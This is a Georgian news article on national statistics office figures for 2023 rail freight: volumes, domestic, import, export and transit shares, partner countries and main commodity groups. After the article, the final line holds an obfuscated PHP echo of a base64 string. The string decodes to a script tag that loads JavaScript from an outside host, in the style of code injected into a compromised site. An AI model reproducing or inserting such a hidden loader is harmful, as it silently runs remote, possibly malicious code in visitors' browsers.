celsiusi
ავერსი შნაიდერი

 სტატისტიკის ეროვნული სამსახურის მონაცემებით, 2023 წელს, 2022 წელთან შედარებით, საქართველოს რკინიგზით გადატანილია 8.2 პროცენტით ნაკლები, სულ 13.6 მლნ. ტონა ტვირთი. აღნიშნული მოცულობის 12.0 პროცენტი მოდის ადგილობრივ გადაზიდვაზე, 31.1 პროცენტი – საერთაშორისო გადაზიდვაზე (არ მოიცავს ტრანზიტს), ხოლო 56.9 პროცენტი – ტრანზიტზე.

საქსტატის ცნობით, 2023 წელს საერთაშორისო გადაზიდვის რეჟიმში რკინიგზით გადატანილი ტვირთის ჯამური მოცულობის 27.4 პროცენტი მოდის ქვეყნიდან გატანილ ტვირთზე, 72.6 პროცენტი კი – ქვეყანაში შემოტანილზე.

„2023 წელს რკინიგზით შემოტანილი ტვირთის მთლიანი მოცულობის 47.4 პროცენტის გამომგზავნ ქვეყანას რუსეთის ფედერაცია წარმოადგენდა, 26.5 პროცენტის გამომგზავნს – აზერბაიჯანი, 3.4 პროცენტისას – თურქმენეთი, 3.2 პროცენტისას – რუმინეთი, 2.8 პროცენტისას – ბულგარეთი, 2.3 პროცენტისას – თურქეთი, 1.3 პროცენტისას – ბელარუსი, 1.2 პროცენტი კი გამოგზავნილი იყო ჩინეთის მიერ.

ამასთან, გასულ წელს რკინიგზით გატანილი ტვირთის მთლიანი მოცულობის 12.0 პროცენტის დანიშნულების ქვეყანას ყაზახეთი წარმოადგენდა, 10.8 პროცენტის დანიშნულების ქვეყანა იყო სომხეთი, 9.5 პროცენტის დანიშნულების ქვეყანა იყო რუსეთის ფედერაცია, ხოლო 4.5 პროცენტისა – აზერბაიჯანი.

რაც შეეხება ტრანზიტს, საქსტატის ცნობით, 2023 წელს ტრანზიტით გადატანილი ტვირთის მთლიანი მოცულობის განაწილება დანიშნულების ქვეყანის მიხედვით შემდეგნაირი იყო: 11.3 პროცენტი – თურქეთი, 8.8 პროცენტი – ნიდერლანდები, 6.2 პროცენტი – იტალია, 5.2 პროცენტი – ჩინეთი, დანარჩენი კი სხვა ქვეყნებზე მოდიოდა. ამავე პერიოდში, ტრანზიტით გადატანილი ტვირთის 6.1 პროცენტის გამომგზავნ ქვეყანას ბრაზილია წარმოადგენდა, 5.7 პროცენტისას – ყაზახეთი, 2.4 პროცენტისას – ჩინეთი, 2.0 პროცენტისას – თურქეთი, ხოლო 1.7 პროცენტის გამომგზავნი იყო აშშ.

საანგარიშო პერიოდში, რკინიგზით გადატანილი ტვირთის მთლიანი მოცულობის 28.9 პროცენტი მოდიოდა ლითონის მადანსა და სამთომოპოვებითი მრეწველობის სხვა ნედლეულზე, 28.5 პროცენტი – ქვანახშირის, ნედლი ნავთობისა და ბუნებრივი აირის სასაქონლო ჯგუფზე, ხოლო 12.7 პროცენტი – საკვებ პროდუქტებზე, სასმელებსა და თამბაქოს ნაწარმზე.

რაც შეეხება საერთაშორისო გადაზიდვებს, საანგარიშო პერიოდში რკინიგზის საშუალებით ძირითადად შემოტანილია ქვანახშირი, ნედლი ნავთობი და ბუნებრივი აირი, სხვა არამეტალური მინერალური პროდუქტები და ლითონის მადანი და სხვა სამთო და კარიერული პროდუქტები. ხოლო გატანილია ლითონის მადანი და სამთომოპოვებითი მრეწველობის სხვა ნედლეული, საკვები პროდუქტები, სასმელები და თამბაქო, სხვადასხვა დასახელების ლითონის ნაწარმი და სოფლის მეურნეობის პროდუქტები“, – აღნიშნულია საქსტატის ინფორმაციაში.

239
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");